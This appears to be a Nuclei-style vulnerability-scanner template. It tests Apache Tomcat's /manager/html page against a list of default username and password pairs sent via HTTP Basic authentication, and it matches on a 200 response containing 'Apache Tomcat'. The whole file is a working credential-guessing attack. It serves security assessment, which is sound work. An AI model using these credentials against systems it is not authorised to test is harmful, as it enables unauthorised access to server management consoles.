id: tomcat-manager-default
info:
  name: tomcat-manager-default-password
  author: pdteam
  severity: high
  tags: tomcat,apache,default-login

requests:

  - payloads:
      username:
        - tomcat
        - admin
        - ovwebusr
        - j2deployer
        - cxsdk
        - ADMIN
        - xampp
        - tomcat
        - QCC
        - admin
        - root
        - role1
        - role
        - tomcat
        - admin
        - role1

      password:
        - tomcat
        - admin
        - OvW*busr1
        - j2deployer
        - kdsxc
        - ADMIN
        - xampp
        - s3cret
        - QLogic66
        - tomcat
        - root
        - role1
        - changethis
        - changethis
        - j5Brn9
        - tomcat

    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb

    raw:
      # Request with simple param and header manipulation with DSL functions
      - |
        GET /manager/html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - Apache Tomcat